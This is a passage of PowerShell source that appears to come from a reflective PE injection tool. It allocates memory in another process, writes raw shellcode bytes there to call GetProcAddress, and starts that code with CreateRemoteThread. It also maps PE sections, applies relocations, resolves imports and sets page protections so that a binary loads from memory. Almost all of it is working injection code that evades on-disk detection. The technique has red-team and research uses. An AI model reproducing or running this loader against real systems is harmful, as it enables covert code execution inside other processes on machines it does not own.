[Type][IntPtr])\n\n\t\t\t$Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $LoadLibraryARetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\t\t\t$Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\t\t}\n\t\telse\n\t\t{\n\t\t\t[IntPtr]$RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $LoadLibraryAAddr -ArgumentPtr $RImportDllPathPtr -Win32Functions $Win32Functions\n\t\t\t$Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)\n\t\t\tif ($Result -ne 0)\n\t\t\t{\n\t\t\t\tThrow \"Call to CreateRemoteThread to call GetProcAddress failed.\"\n\t\t\t}\n\t\t\t\n\t\t\t[Int32]$ExitCode = 0\n\t\t\t$Result = $Win32Functions.GetExitCodeThread.Invoke($RThreadHandle, [Ref]$ExitCode)\n\t\t\tif (($Result -eq 0) -or ($ExitCode -eq 0))\n\t\t\t{\n\t\t\t\tThrow \"Call to GetExitCodeThread failed\"\n\t\t\t}\n\t\t\t\n\t\t\t[IntPtr]$DllAddress = [IntPtr]$ExitCode\n\t\t}\n\t\t\n\t\t$Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RImportDllPathPtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\t\t\n\t\treturn $DllAddress\n\t}\n\t\n\t\n\tFunction Get-RemoteProcAddress\n\t{\n\t\tParam(\n\t\t[Parameter(Position=0, Mandatory=$true)]\n\t\t[IntPtr]\n\t\t$RemoteProcHandle,\n\t\t\n\t\t[Parameter(Position=1, Mandatory=$true)]\n\t\t[IntPtr]\n\t\t$RemoteDllHandle,\n\t\t\n\t\t[Parameter(Position=2, Mandatory=$true)]\n\t\t[String]\n\t\t$FunctionName\n\t\t)\n\n\t\t$PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])\n\t\t$FunctionNamePtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($FunctionName)\n\t\t\n\t\t#Write FunctionName to memory (will be used in GetProcAddress)\n\t\t$FunctionNameSize = [UIntPtr][UInt64]([UInt64]$FunctionName.Length + 1)\n\t\t$RFuncNamePtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $FunctionNameSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n\t\tif ($RFuncNamePtr -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tThrow \"Unable to allocate memory in the remote process\"\n\t\t}\n\n\t\t[UIntPtr]$NumBytesWritten = [UIntPtr]::Zero\n\t\t$Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RFuncNamePtr, $FunctionNamePtr, $FunctionNameSize, [Ref]$NumBytesWritten)\n\t\t[System.Runtime.InteropServices.Marshal]::FreeHGlobal($FunctionNamePtr)\n\t\tif ($Success -eq $false)\n\t\t{\n\t\t\tThrow \"Unable to write DLL path to remote process memory\"\n\t\t}\n\t\tif ($FunctionNameSize -ne $NumBytesWritten)\n\t\t{\n\t\t\tThrow \"Didn't write the expected amount of bytes when writing a DLL path to load to the remote process\"\n\t\t}\n\t\t\n\t\t#Get address of GetProcAddress\n\t\t$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke(\"kernel32.dll\")\n\t\t$GetProcAddressAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, \"GetProcAddress\") #Kernel32 loaded to the same address for all processes\n\n\t\t\n\t\t#Allocate memory for the address returned by GetProcAddress\n\t\t$GetProcAddressRetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UInt64][UInt64]$PtrSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n\t\tif ($GetProcAddressRetMem -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tThrow \"Unable to allocate memory in the remote process for the return value of GetProcAddress\"\n\t\t}\n\t\t\n\t\t\n\t\t#Write Shellcode to the remote process which will call GetProcAddress\n\t\t#Shellcode: GetProcAddress.asm\n\t\t#todo: need to have detection for when to get by ordinal\n\t\t[Byte[]]$GetProcAddressSC = @()\n\t\tif ($PEInfo.PE64Bit -eq $true)\n\t\t{\n\t\t\t$GetProcAddressSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)\n\t\t\t$GetProcAddressSC2 = @(0x48, 0xba)\n\t\t\t$GetProcAddressSC3 = @(0x48, 0xb8)\n\t\t\t$GetProcAddressSC4 = @(0xff, 0xd0, 0x48, 0xb9)\n\t\t\t$GetProcAddressSC5 = @(0x48, 0x89, 0x01, 0x48, 0x89, 0xdc, 0x5b, 0xc3)\n\t\t}\n\t\telse\n\t\t{\n\t\t\t$GetProcAddressSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xc0, 0xb8)\n\t\t\t$GetProcAddressSC2 = @(0xb9)\n\t\t\t$GetProcAddressSC3 = @(0x51, 0x50, 0xb8)\n\t\t\t$GetProcAddressSC4 = @(0xff, 0xd0, 0xb9)\n\t\t\t$GetProcAddressSC5 = @(0x89, 0x01, 0x89, 0xdc, 0x5b, 0xc3)\n\t\t}\n\t\t$SCLength = $GetProcAddressSC1.Length + $GetProcAddressSC2.Length + $GetProcAddressSC3.Length + $GetProcAddressSC4.Length + $GetProcAddressSC5.Length + ($PtrSize * 4)\n\t\t$SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)\n\t\t$SCPSMemOriginal = $SCPSMem\n\t\t\n\t\tWrite-BytesToMemory -Bytes $GetProcAddressSC1 -MemoryAddress $SCPSMem\n\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC1.Length)\n\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($RemoteDllHandle, $SCPSMem, $false)\n\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\tWrite-BytesToMemory -Bytes $GetProcAddressSC2 -MemoryAddress $SCPSMem\n\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC2.Length)\n\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($RFuncNamePtr, $SCPSMem, $false)\n\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\tWrite-BytesToMemory -Bytes $GetProcAddressSC3 -MemoryAddress $SCPSMem\n\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC3.Length)\n\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressAddr, $SCPSMem, $false)\n\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\tWrite-BytesToMemory -Bytes $GetProcAddressSC4 -MemoryAddress $SCPSMem\n\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC4.Length)\n\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressRetMem, $SCPSMem, $false)\n\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\tWrite-BytesToMemory -Bytes $GetProcAddressSC5 -MemoryAddress $SCPSMem\n\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC5.Length)\n\t\t\n\t\t$RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)\n\t\tif ($RSCAddr -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tThrow \"Unable to allocate memory in the remote process for shellcode\"\n\t\t}\n\t\t\n\t\t$Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)\n\t\tif (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))\n\t\t{\n\t\t\tThrow \"Unable to write shellcode to remote process memory.\"\n\t\t}\n\t\t\n\t\t$RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions\n\t\t$Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)\n\t\tif ($Result -ne 0)\n\t\t{\n\t\t\tThrow \"Call to CreateRemoteThread to call GetProcAddress failed.\"\n\t\t}\n\t\t\n\t\t#The process address is written to memory in the remote process at address $GetProcAddressRetMem, read this memory\n\t\t[IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)\n\t\t$Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $GetProcAddressRetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten)\n\t\tif (($Result -eq $false) -or ($NumBytesWritten -eq 0))\n\t\t{\n\t\t\tThrow \"Call to ReadProcessMemory failed\"\n\t\t}\n\t\t[IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])\n\n\t\t$Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\t\t$Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RFuncNamePtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\t\t$Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $GetProcAddressRetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\t\t\n\t\treturn $ProcAddress\n\t}\n\n\n\tFunction Copy-Sections\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[Byte[]]\n\t\t$PEBytes,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$PEInfo,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Functions,\n\t\t\n\t\t[Parameter(Position = 3, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Types\n\t\t)\n\t\t\n\t\tfor( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++)\n\t\t{\n\t\t\t[IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))\n\t\t\t$SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER)\n\t\t\n\t\t\t#Address to copy the section to\n\t\t\t[IntPtr]$SectionDestAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$SectionHeader.VirtualAddress))\n\t\t\t\n\t\t\t#SizeOfRawData is the size of the data on disk, VirtualSize is the minimum space that can be allocated\n\t\t\t#    in memory for the section. If VirtualSize > SizeOfRawData, pad the extra spaces with 0. If\n\t\t\t#    SizeOfRawData > VirtualSize, it is because the section stored on disk has padding that we can throw away,\n\t\t\t#    so truncate SizeOfRawData to VirtualSize\n\t\t\t$SizeOfRawData = $SectionHeader.SizeOfRawData\n\n\t\t\tif ($SectionHeader.PointerToRawData -eq 0)\n\t\t\t{\n\t\t\t\t$SizeOfRawData = 0\n\t\t\t}\n\t\t\t\n\t\t\tif ($SizeOfRawData -gt $SectionHeader.VirtualSize)\n\t\t\t{\n\t\t\t\t$SizeOfRawData = $SectionHeader.VirtualSize\n\t\t\t}\n\t\t\t\n\t\t\tif ($SizeOfRawData -gt 0)\n\t\t\t{\n\t\t\t\tTest-MemoryRangeValid -DebugString \"Copy-Sections::MarshalCopy\" -PEInfo $PEInfo -StartAddress $SectionDestAddr -Size $SizeOfRawData | Out-Null\n\t\t\t\t[System.Runtime.InteropServices.Marshal]::Copy($PEBytes, [Int32]$SectionHeader.PointerToRawData, $SectionDestAddr, $SizeOfRawData)\n\t\t\t}\n\t\t\n\t\t\t#If SizeOfRawData is less than VirtualSize, set memory to 0 for the extra space\n\t\t\tif ($SectionHeader.SizeOfRawData -lt $SectionHeader.VirtualSize)\n\t\t\t{\n\t\t\t\t$Difference = $SectionHeader.VirtualSize - $SizeOfRawData\n\t\t\t\t[IntPtr]$StartAddress = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$SectionDestAddr) ([Int64]$SizeOfRawData))\n\t\t\t\tTest-MemoryRangeValid -DebugString \"Copy-Sections::Memset\" -PEInfo $PEInfo -StartAddress $StartAddress -Size $Difference | Out-Null\n\t\t\t\t$Win32Functions.memset.Invoke($StartAddress, 0, [IntPtr]$Difference) | Out-Null\n\t\t\t}\n\t\t}\n\t}\n\n\n\tFunction Update-MemoryAddresses\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$PEInfo,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[Int64]\n\t\t$OriginalImageBase,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Constants,\n\t\t\n\t\t[Parameter(Position = 3, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Types\n\t\t)\n\t\t\n\t\t[Int64]$BaseDifference = 0\n\t\t$AddDifference = $true #Track if the difference variable should be added or subtracted from variables\n\t\t[UInt32]$ImageBaseRelocSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_BASE_RELOCATION)\n\t\t\n\t\t#If the PE was loaded to its expected address or there are no entries in the BaseRelocationTable, nothing to do\n\t\tif (($OriginalImageBase -eq [Int64]$PEInfo.EffectivePEHandle) `\n\t\t\t\t-or ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.Size -eq 0))\n\t\t{\n\t\t\treturn\n\t\t}\n\n\n\t\telseif ((Compare-Val1GreaterThanVal2AsUInt ($OriginalImageBase) ($PEInfo.EffectivePEHandle)) -eq $true)\n\t\t{\n\t\t\t$BaseDifference = Sub-SignedIntAsUnsigned ($OriginalImageBase) ($PEInfo.EffectivePEHandle)\n\t\t\t$AddDifference = $false\n\t\t}\n\t\telseif ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.EffectivePEHandle) ($OriginalImageBase)) -eq $true)\n\t\t{\n\t\t\t$BaseDifference = Sub-SignedIntAsUnsigned ($PEInfo.EffectivePEHandle) ($OriginalImageBase)\n\t\t}\n\t\t\n\t\t#Use the IMAGE_BASE_RELOCATION structure to find memory addresses which need to be modified\n\t\t[IntPtr]$BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.VirtualAddress))\n\t\twhile($true)\n\t\t{\n\t\t\t#If SizeOfBlock == 0, we are done\n\t\t\t$BaseRelocationTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($BaseRelocPtr, [Type]$Win32Types.IMAGE_BASE_RELOCATION)\n\n\t\t\tif ($BaseRelocationTable.SizeOfBlock -eq 0)\n\t\t\t{\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\t[IntPtr]$MemAddrBase = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$BaseRelocationTable.VirtualAddress))\n\t\t\t$NumRelocations = ($BaseRelocationTable.SizeOfBlock - $ImageBaseRelocSize) / 2\n\n\t\t\t#Loop through each relocation\n\t\t\tfor($i = 0; $i -lt $NumRelocations; $i++)\n\t\t\t{\n\t\t\t\t#Get info for this relocation\n\t\t\t\t$RelocationInfoPtr = [IntPtr](Add-SignedIntAsUnsigned ([IntPtr]$BaseRelocPtr) ([Int64]$ImageBaseRelocSize + (2 * $i)))\n\t\t\t\t[UInt16]$RelocationInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($RelocationInfoPtr, [Type][UInt16])\n\n\t\t\t\t#First 4 bits is the relocation type, last 12 bits is the address offset from $MemAddrBase\n\t\t\t\t[UInt16]$RelocOffset = $RelocationInfo -band 0x0FFF\n\t\t\t\t[UInt16]$RelocType = $RelocationInfo -band 0xF000\n\t\t\t\tfor ($j = 0; $j -lt 12; $j++)\n\t\t\t\t{\n\t\t\t\t\t$RelocType = [Math]::Floor($RelocType / 2)\n\t\t\t\t}\n\n\t\t\t\t#For DLL's there are two types of relocations used according to the following MSDN article. One for 64bit and one for 32bit.\n\t\t\t\t#This appears to be true for EXE's as well.\n\t\t\t\t#\tSite: http://msdn.microsoft.com/en-us/magazine/cc301808.aspx\n\t\t\t\tif (($RelocType -eq $Win32Constants.IMAGE_REL_BASED_HIGHLOW) `\n\t\t\t\t\t\t-or ($RelocType -eq $Win32Constants.IMAGE_REL_BASED_DIR64))\n\t\t\t\t{\t\t\t\n\t\t\t\t\t#Get the current memory address and update it based off the difference between PE expected base address and actual base address\n\t\t\t\t\t[IntPtr]$FinalAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$MemAddrBase) ([Int64]$RelocOffset))\n\t\t\t\t\t[IntPtr]$CurrAddr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FinalAddr, [Type][IntPtr])\n\t\t\n\t\t\t\t\tif ($AddDifference -eq $true)\n\t\t\t\t\t{\n\t\t\t\t\t\t[IntPtr]$CurrAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference))\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\t[IntPtr]$CurrAddr = [IntPtr](Sub-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference))\n\t\t\t\t\t}\t\t\t\t\n\n\t\t\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null\n\t\t\t\t}\n\t\t\t\telseif ($RelocType -ne $Win32Constants.IMAGE_REL_BASED_ABSOLUTE)\n\t\t\t\t{\n\t\t\t\t\t#IMAGE_REL_BASED_ABSOLUTE is just used for padding, we don't actually do anything with it\n\t\t\t\t\tThrow \"Unknown relocation found, relocation value: $RelocType, relocationinfo: $RelocationInfo\"\n\t\t\t\t}\n\t\t\t}\n\t\t\t\n\t\t\t$BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$BaseRelocPtr) ([Int64]$BaseRelocationTable.SizeOfBlock))\n\t\t}\n\t}\n\n\n\tFunction Import-DllImports\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$PEInfo,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Functions,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Types,\n\t\t\n\t\t[Parameter(Position = 3, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Constants,\n\t\t\n\t\t[Parameter(Position = 4, Mandatory = $false)]\n\t\t[IntPtr]\n\t\t$RemoteProcHandle\n\t\t)\n\t\t\n\t\t$RemoteLoading = $false\n\t\tif ($PEInfo.PEHandle -ne $PEInfo.EffectivePEHandle)\n\t\t{\n\t\t\t$RemoteLoading = $true\n\t\t}\n\t\t\n\t\tif ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)\n\t\t{\n\t\t\t[IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)\n\t\t\t\n\t\t\twhile ($true)\n\t\t\t{\n\t\t\t\t$ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)\n\t\t\t\t\n\t\t\t\t#If the structure is null, it signals that this is the end of the array\n\t\t\t\tif ($ImportDescriptor.Characteristics -eq 0 `\n\t\t\t\t\t\t-and $ImportDescriptor.FirstThunk -eq 0 `\n\t\t\t\t\t\t-and $ImportDescriptor.ForwarderChain -eq 0 `\n\t\t\t\t\t\t-and $ImportDescriptor.Name -eq 0 `\n\t\t\t\t\t\t-and $ImportDescriptor.TimeDateStamp -eq 0)\n\t\t\t\t{\n\t\t\t\t\tWrite-Verbose \"Done importing DLL imports\"\n\t\t\t\t\tbreak\n\t\t\t\t}\n\n\t\t\t\t$ImportDllHandle = [IntPtr]::Zero\n\t\t\t\t$ImportDllPathPtr = (Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name))\n\t\t\t\t$ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr)\n\t\t\t\t\n\t\t\t\tif ($RemoteLoading -eq $true)\n\t\t\t\t{\n\t\t\t\t\t$ImportDllHandle = Import-DllInRemoteProcess -RemoteProcHandle $RemoteProcHandle -ImportDllPathPtr $ImportDllPathPtr\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$ImportDllHandle = $Win32Functions.LoadLibrary.Invoke($ImportDllPath)\n\t\t\t\t}\n\n\t\t\t\tif (($ImportDllHandle -eq $null) -or ($ImportDllHandle -eq [IntPtr]::Zero))\n\t\t\t\t{\n\t\t\t\t\tthrow \"Error importing DLL, DLLName: $ImportDllPath\"\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t#Get the first thunk, then loop through all of them\n\t\t\t\t[IntPtr]$ThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.FirstThunk)\n\t\t\t\t[IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.Characteristics) #Characteristics is overloaded with OriginalFirstThunk\n\t\t\t\t[IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr])\n\t\t\t\t\n\t\t\t\twhile ($OriginalThunkRefVal -ne [IntPtr]::Zero)\n\t\t\t\t{\n\t\t\t\t\t$ProcedureName = ''\n\t\t\t\t\t#Compare thunkRefVal to IMAGE_ORDINAL_FLAG, which is defined as 0x80000000 or 0x8000000000000000 depending on 32bit or 64bit\n\t\t\t\t\t#\tIf the top bit is set on an int, it will be negative, so instead of worrying about casting this to uint\n\t\t\t\t\t#\tand doing the comparison, just see if it is less than 0\n\t\t\t\t\t[IntPtr]$NewThunkRef = [IntPtr]::Zero\n\t\t\t\t\tif([Int64]$OriginalThunkRefVal -lt 0)\n\t\t\t\t\t{\n\t\t\t\t\t\t$ProcedureName = [Int64]$OriginalThunkRefVal -band 0xffff #This is actually a lookup by ordinal\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\t[IntPtr]$StringAddr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($OriginalThunkRefVal)\n\t\t\t\t\t\t$StringAddr = Add-SignedIntAsUnsigned $StringAddr ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16]))\n\t\t\t\t\t\t$ProcedureName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($StringAddr)\n\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t\tif ($RemoteLoading -eq $true)\n\t\t\t\t\t{\n\t\t\t\t\t\t[IntPtr]$NewThunkRef = Get-RemoteProcAddress -RemoteProcHandle $RemoteProcHandle -RemoteDllHandle $ImportDllHandle -FunctionName $ProcedureName\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\t[IntPtr]$NewThunkRef = $Win32Functions.GetProcAddress.Invoke($ImportDllHandle, $ProcedureName)\n\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t\tif ($NewThunkRef -eq $null -or $NewThunkRef -eq [IntPtr]::Zero)\n\t\t\t\t\t{\n\t\t\t\t\t\tThrow \"New function reference is null, this is almost certainly a bug in this script. Function: $ProcedureName. Dll: $ImportDllPath\"\n\t\t\t\t\t}\n\n\t\t\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($NewThunkRef, $ThunkRef, $false)\n\t\t\t\t\t\n\t\t\t\t\t$ThunkRef = Add-SignedIntAsUnsigned ([Int64]$ThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))\n\t\t\t\t\t[IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ([Int64]$OriginalThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))\n\t\t\t\t\t[IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr])\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t$ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))\n\t\t\t}\n\t\t}\n\t}\n\n\tFunction Get-VirtualProtectValue\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[UInt32]\n\t\t$SectionCharacteristics\n\t\t)\n\t\t\n\t\t$ProtectionFlag = 0x0\n\t\tif (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_EXECUTE) -gt 0)\n\t\t{\n\t\t\tif (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)\n\t\t\t{\n\t\t\t\tif (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)\n\t\t\t\t{\n\t\t\t\t\t$ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READWRITE\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READ\n\t\t\t\t}\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tif (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)\n\t\t\t\t{\n\t\t\t\t\t$ProtectionFlag = $Win32Constants.PAGE_EXECUTE_WRITECOPY\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$ProtectionFlag = $Win32Constants.PAGE_EXECUTE\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tif (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)\n\t\t\t{\n\t\t\t\tif (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)\n\t\t\t\t{\n\t\t\t\t\t$ProtectionFlag = $Win32Constants.PAGE_READWRITE\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$ProtectionFlag = $Win32Constants.PAGE_READONLY\n\t\t\t\t}\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tif (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)\n\t\t\t\t{\n\t\t\t\t\t$ProtectionFlag = $Win32Constants.PAGE_WRITECOPY\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$ProtectionFlag = $Win32Constants.PAGE_NOACCESS\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\t\n\t\tif (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_NOT_CACHED) -gt 0)\n\t\t{\n\t\t\t$ProtectionFlag = $ProtectionFlag -bor $Win32Constants.PAGE_NOCACHE\n\t\t}\n\t\t\n\t\treturn $ProtectionFlag\n\t}\n\n\tFunction Update-MemoryProtectionFlags\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$PEInfo,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Functions,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Constants,\n\t\t\n\t\t[Parameter(Position = 3, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Types\n\t\t)\n\t\t\n\t\tfor( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++)\n\t\t{\n\t\t\t[IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))\n\t\t\t$SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, 